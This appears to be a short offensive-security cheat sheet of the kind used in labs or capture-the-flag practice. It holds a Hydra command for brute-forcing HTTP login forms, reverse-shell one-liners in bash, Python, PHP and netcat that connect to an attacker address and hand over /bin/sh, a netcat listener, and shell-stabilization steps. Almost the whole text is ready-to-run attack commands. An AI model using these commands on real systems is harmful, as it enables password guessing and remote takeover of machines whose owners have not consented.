Initial Access

Hydra

Post method example:

hydra -l <username> -P <password list> <target URL> http-post-form "/<login URI>:<login form data>:<error message>"

Cheat Sheet

Reverse Shell

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

rm -f /tmp/a; mkfifo /tmp/a; nc 10.13.60.191 4444 0</tmp/a | /bin/sh >/tmp/a 2>&1; rm /tmp/a

* Cheat Sheet * PHP Reverse Shell

Listener:

nc -lvnp 4444

Shell Stabilization

Option 1

python -c 'import pty;pty.spawn("/bin/bash")'

Option 2

ctrl + z then

stty raw -echo && fg

Option 3

rlwrap nc -lvnp 4444